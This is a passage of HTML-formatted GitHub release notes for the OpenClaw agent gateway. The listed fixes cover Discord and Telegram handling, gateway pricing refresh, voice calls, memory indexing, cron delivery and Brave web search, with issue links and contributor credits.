<li>Discord/threads/PluralKit: canonicalize proxied webhook turns to the original message id for dedupe, inject thread starter context only on the first effective thread turn, and resolve thread <code>ownerId</code>/<code>parentId</code> from Discord API-style snake_case payload fields so bot-owned autoThreads do not require unnecessary mentions. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4047195697" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/41355" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/41355/hovercard" href="https://github.com/openclaw/openclaw/issues/41355">#41355</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4067889287" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44447" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44447/hovercard" href="https://github.com/openclaw/openclaw/issues/44447">#44447</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4067894290" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44449" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44449/hovercard" href="https://github.com/openclaw/openclaw/issues/44449">#44449</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/acgh213/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/acgh213">@acgh213</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/p3nchan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/p3nchan">@p3nchan</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mgh3326/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mgh3326">@mgh3326</a>.</li>
<li>Gateway/diagnostics: include a bounded redacted startup error message in stability bundles, so crash-loop reports identify the failing plugin or contract without exposing secrets. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4366332404" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75797" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75797/hovercard" href="https://github.com/openclaw/openclaw/issues/75797">#75797</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ymebosma/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ymebosma">@ymebosma</a>.</li>
<li>Gateway/pricing: defer optional model pricing catalog refresh until after sidecars and channels reach the ready path, so slow OpenRouter or LiteLLM pricing fetches cannot block Gateway readiness. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348322680" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74128" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74128/hovercard" href="https://github.com/openclaw/openclaw/issues/74128">#74128</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342339751" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73486" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73486/hovercard" href="https://github.com/openclaw/openclaw/pull/73486">#73486</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ctbritt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ctbritt">@ctbritt</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alprclbi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alprclbi">@alprclbi</a>.</li>
<li>Gateway/pricing: abort in-flight model pricing catalog fetches when Gateway shutdown stops the refresh loop, and avoid post-stop cache writes or refresh timers. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331072247" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72208" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72208/hovercard" href="https://github.com/openclaw/openclaw/issues/72208">#72208</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rzcq/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rzcq">@rzcq</a>.</li>
<li>Codex/app-server: make startup retry cleanup ownership-aware so concurrent Codex lanes cannot close another lane's freshly restarted shared app-server client. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Google Meet/Twilio/Voice Call: report missing dial-in details during setup, explain that Twilio needs a phone dial plan for Meet URLs, start the phone leg before Meet PIN DTMF, delay intro speech until after post-connect dialing, log each stage, and accept provider call IDs for gateway speak/continue while reporting ended-call state from history.</li>
<li>Control UI/Talk: allow the OpenAI Realtime WebRTC offer endpoint through the Control UI CSP, configure browser sessions with explicit VAD/transcription input settings, and surface OpenAI realtime error/lifecycle events instead of leaving Talk stuck as live with no diagnostic. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341743461" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73427" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73427/hovercard" href="https://github.com/openclaw/openclaw/issues/73427">#73427</a>.</li>
<li>Plugins: clarify config-selected duplicate plugin override diagnostics and document manifest schema updates for bundled-plugin forks. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3894832647" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/8582" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/8582/hovercard" href="https://github.com/openclaw/openclaw/issues/8582">#8582</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sachah/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sachah">@sachah</a>.</li>
<li>CLI backends/Claude: make live-session JSONL turn caps bounded and configurable via <code>reliability.outputLimits</code>, raising the default guard for tool-heavy Claude CLI turns while preserving memory limits. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367015166" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75838" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75838/hovercard" href="https://github.com/openclaw/openclaw/issues/75838">#75838</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hcordoba840/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hcordoba840">@hcordoba840</a>.</li>
<li>Telegram/DMs/network/commands: keep incidental <code>message_thread_id</code> reply-with-quote metadata on flat DM sessions unless topic isolation is configured, raise outbound text and typing Bot API guards to 60 seconds with safe timeout overrides and typing fallback retries, and register/clear command menus in default and group-chat scopes so <code>/status</code> and plugin commands stay available in forum topics. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368172291" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75975" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75975/hovercard" href="https://github.com/openclaw/openclaw/issues/75975">#75975</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368500963" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76013" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76013/hovercard" href="https://github.com/openclaw/openclaw/issues/76013">#76013</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347610813" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74032" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74032/hovercard" href="https://github.com/openclaw/openclaw/issues/74032">#74032</a>; updates <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3882532827" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/6457" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/6457/hovercard" href="https://github.com/openclaw/openclaw/pull/6457">#6457</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ProjectEvolutionEVE/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ProjectEvolutionEVE">@ProjectEvolutionEVE</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/iaki1206/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/iaki1206">@iaki1206</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dae-sun/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dae-sun">@dae-sun</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/WouldenShyp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/WouldenShyp">@WouldenShyp</a>.</li>
<li>Providers/OpenAI: resolve <code>keychain:&lt;service&gt;:&lt;account&gt;</code> <code>OPENAI_API_KEY</code> refs before creating OpenAI Realtime browser sessions or voice bridges, with a bounded cached Keychain lookup. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330678787" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72120" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72120/hovercard" href="https://github.com/openclaw/openclaw/issues/72120">#72120</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ctbritt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ctbritt">@ctbritt</a>.</li>
<li>Discord/gateway: reconnect when the gateway socket closes while waiting for the shared IDENTIFY concurrency window, instead of silently skipping IDENTIFY and leaving the bot online but unresponsive. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353606299" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74617" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74617/hovercard" href="https://github.com/openclaw/openclaw/issues/74617">#74617</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zeeskdr-ai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zeeskdr-ai">@zeeskdr-ai</a>.</li>
<li>Voice Call: add <code>sessionScope: "per-call"</code> for fresh per-call agent memory while preserving the default per-phone caller history. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4072126400" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/45280" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/45280/hovercard" href="https://github.com/openclaw/openclaw/issues/45280">#45280</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pondcountry/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pondcountry">@pondcountry</a>.</li>
<li>Music generation: raise too-small tool timeouts to the provider-safe 10-second floor and collapse cascading abort fallback errors into a clearer root-cause summary. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Memory-core/dreaming: include the primary runtime workspace in multi-agent dreaming sweeps without mixing main-agent session transcripts into configured subagent workspaces. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4307075727" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70014" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70014/hovercard" href="https://github.com/openclaw/openclaw/issues/70014">#70014</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ttomiczek/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ttomiczek">@ttomiczek</a>.</li>
<li>Control UI: add tab/RPC timing attribution and decouple slow Overview/Cron secondary refreshes so Sessions navigation gets immediate visible feedback. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4235854543" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64004" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64004/hovercard" href="https://github.com/openclaw/openclaw/issues/64004">#64004</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/WaMaSeDu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/WaMaSeDu">@WaMaSeDu</a>.</li>
<li>Memory: retry transient SQLite index file swaps during atomic reindex on Windows, so brief <code>EBUSY</code>, <code>EPERM</code>, or <code>EACCES</code> locks do not fail memory rebuilds. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4237587612" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64187" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64187/hovercard" href="https://github.com/openclaw/openclaw/issues/64187">#64187</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kunpeng-ai-lab/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kunpeng-ai-lab">@kunpeng-ai-lab</a>.</li>
<li>Telegram/startup/models: use the existing <code>getMe</code> request guard and higher <code>timeoutSeconds</code> configs for slow Bot API paths, and make model picker confirmations say selections are session-scoped. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4366123141" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75783" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75783/hovercard" href="https://github.com/openclaw/openclaw/issues/75783">#75783</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368057405" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75965" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75965/hovercard" href="https://github.com/openclaw/openclaw/issues/75965">#75965</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tankotan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tankotan">@tankotan</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sd1114820/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sd1114820">@sd1114820</a>.</li>
<li>Control UI/slash commands: keep fallback command metadata on a browser-safe registry path, so provider thinking runtime imports cannot blank the Web UI with <code>process is not defined</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368284321" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75987" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75987/hovercard" href="https://github.com/openclaw/openclaw/issues/75987">#75987</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/novkien/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/novkien">@novkien</a>.</li>
<li>Heartbeat/Discord: keep async exec completion events out of the generic <code>System (untrusted)</code> prompt block and let the dedicated exec heartbeat prompt handle them, so Discord no longer receives raw exec failure tails as separate system-style messages. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4259713936" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66366" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66366/hovercard" href="https://github.com/openclaw/openclaw/issues/66366">#66366</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Promee-ThaBossHoss/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Promee-ThaBossHoss">@Promee-ThaBossHoss</a>.</li>
<li>Heartbeat/scheduler: make heartbeat phase scheduling active-hours-aware so the scheduler seeks forward to the first in-window phase slot instead of arming timers for quiet-hours slots and relying solely on the runtime guard. Non-UTC <code>activeHours.timezone</code> values (e.g. <code>Asia/Shanghai</code>) now correctly influence when the next heartbeat timer fires, avoiding wasted quiet-hours ticks and long dormant gaps after gateway restarts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363246759" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75487" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75487/hovercard" href="https://github.com/openclaw/openclaw/issues/75487">#75487</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</li>
<li>Channels: strip plain-text MiniMax and XML tool-call scaffolding from shared user-facing reply sanitization, so messaging channels do not deliver raw model tool syntax when a provider emits it as text instead of structured tool calls. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4221535812" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62820" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62820/hovercard" href="https://github.com/openclaw/openclaw/issues/62820">#62820</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/canh0chua/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/canh0chua">@canh0chua</a>.</li>
<li>Infer/media: report missing image-understanding and audio-transcription provider configuration for <code>image describe</code>, <code>image describe-many</code>, and <code>audio transcribe</code> instead of blaming the input path when no provider is available. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343347839" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73569" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73569/hovercard" href="https://github.com/openclaw/openclaw/issues/73569">#73569</a> and supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343748623" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73593" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73593/hovercard" href="https://github.com/openclaw/openclaw/pull/73593">#73593</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4349938490" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74288" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74288/hovercard" href="https://github.com/openclaw/openclaw/pull/74288">#74288</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4352412851" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74495" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74495/hovercard" href="https://github.com/openclaw/openclaw/pull/74495">#74495</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bittoby/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bittoby">@bittoby</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tmimmanuel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tmimmanuel">@tmimmanuel</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Linux2010/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Linux2010">@Linux2010</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vyctorbrzezowski/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vyctorbrzezowski">@vyctorbrzezowski</a>.</li>
<li>CLI/infer: reject local <code>codex/*</code> one-shot model probes before simple-completion dispatch and point operators at the Codex app-server runtime path instead of ending with an empty-output error.</li>
<li>Docs/health: clarify that session listing surfaces stored conversation rows rather than Discord/channel socket liveness, and point connectivity checks at channel status and health probes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4312712740" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70420" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70420/hovercard" href="https://github.com/openclaw/openclaw/issues/70420">#70420</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ashersoutherncities-art/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ashersoutherncities-art">@ashersoutherncities-art</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/martingarramon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/martingarramon">@martingarramon</a>.</li>
<li>WhatsApp/Cron: keep DM pairing-store approvals out of implicit cron and heartbeat recipient fallback, so scheduled automation only uses explicit targets, active configured recipients, or configured <code>allowFrom</code> entries. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4215965103" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62339" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62339/hovercard" href="https://github.com/openclaw/openclaw/issues/62339">#62339</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kelvinisly-collab/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kelvinisly-collab">@kelvinisly-collab</a>.</li>
<li>Google Meet: keep the agent-facing <code>google_meet</code> tool visible on non-macOS hosts but block local Chrome realtime actions with guidance, so Linux agents can still use transcribe, Twilio, chrome-node, and artifact flows without choosing the macOS-only BlackHole path. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367913692" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75950" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75950/hovercard" href="https://github.com/openclaw/openclaw/issues/75950">#75950</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/actual-software-inc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/actual-software-inc">@actual-software-inc</a>.</li>
<li>macOS/settings: keep opening General from rewriting <code>openclaw.json</code> during Tailscale settings hydration, preserving <code>gateway</code>, <code>auth</code>, <code>meta</code>, and <code>wizard</code> until the user changes a setting. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4192663996" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59545" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59545/hovercard" href="https://github.com/openclaw/openclaw/issues/59545">#59545</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Tengdw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Tengdw">@Tengdw</a>.</li>
<li>Discord: prioritize interaction callbacks ahead of stale background REST work without polling active REST buckets, validate oversized gateway payloads and member-intent requests before send, and forward explicit component payloads from message actions. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362439940" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75363" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75363/hovercard" href="https://github.com/openclaw/openclaw/pull/75363">#75363</a>)</li>
<li>Active Memory: use the configured recall timeout as the blocking prompt-build hook budget by default and move cold-start setup grace behind explicit <code>setupGraceTimeoutMs</code> config, so the plugin no longer silently extends 15000 ms configs to 45000 ms on the main lane. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367042978" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75843" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75843/hovercard" href="https://github.com/openclaw/openclaw/issues/75843">#75843</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vishutdhar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vishutdhar">@vishutdhar</a>.</li>
<li>Plugins/web-provider: reuse the active gateway plugin registry for runtime web provider resolution after deriving the same candidate plugin ids as the loader path, avoiding a redundant <code>loadOpenClawPlugins</code> call on every request while preserving origin and scope filters. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363428779" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75513" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75513/hovercard" href="https://github.com/openclaw/openclaw/issues/75513">#75513</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jochen/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jochen">@jochen</a>.</li>
<li>Crestodian/CLI: exit non-zero when interactive Crestodian is invoked without a TTY, so scripts and CI no longer treat the setup error as success. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344381793" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73646" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73646/hovercard" href="https://github.com/openclaw/openclaw/issues/73646">#73646</a> and supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347317157" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73928" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73928/hovercard" href="https://github.com/openclaw/openclaw/pull/73928">#73928</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347801211" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74059" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74059/hovercard" href="https://github.com/openclaw/openclaw/pull/74059">#74059</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bittoby/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bittoby">@bittoby</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/luyao618/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/luyao618">@luyao618</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Linux2010/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Linux2010">@Linux2010</a>.</li>
<li>Cron: keep implicit/default isolated cron announce deliveries out of the main session awareness queue, so isolated jobs do not accumulate in the main conversation. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4208027555" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61426" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61426/hovercard" href="https://github.com/openclaw/openclaw/issues/61426">#61426</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Lihannon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Lihannon">@Lihannon</a>.</li>
<li>Subagents: avoid duplicate parent-visible replies when a parent uses <code>sessions_send</code> on its own persistent native subagent session, while preserving announce delivery for async sends. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342979045" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73550" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73550/hovercard" href="https://github.com/openclaw/openclaw/issues/73550">#73550</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sylviazhang2006-design/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sylviazhang2006-design">@sylviazhang2006-design</a>.</li>
<li>Web search/Brave: add opt-in <code>brave.http</code> diagnostics for Brave request URLs/query params, response status/timing, and cache hit/miss/write events without logging API keys or response bodies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4144203570" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55196" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/55196/hovercard" href="https://github.com/openclaw/openclaw/issues/55196">#55196</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mecampbellsoup/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mecampbellsoup">@mecampbellsoup</a>.</li>
<li>Web search/Brave: add <code>plugins.entries.brave.config.webSearch.baseUrl</code> for Brave-compatible proxies, including endpoint-aware cache keys for both web and LLM Context modes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3951923414" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/19075" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/19075/hovercard" href="https://github.com/openclaw/openclaw/issues/19075">#19075</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jkoprax/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jkoprax">@jkoprax</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vishnukool/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vishnukool">@vishnukool</a>.</li>
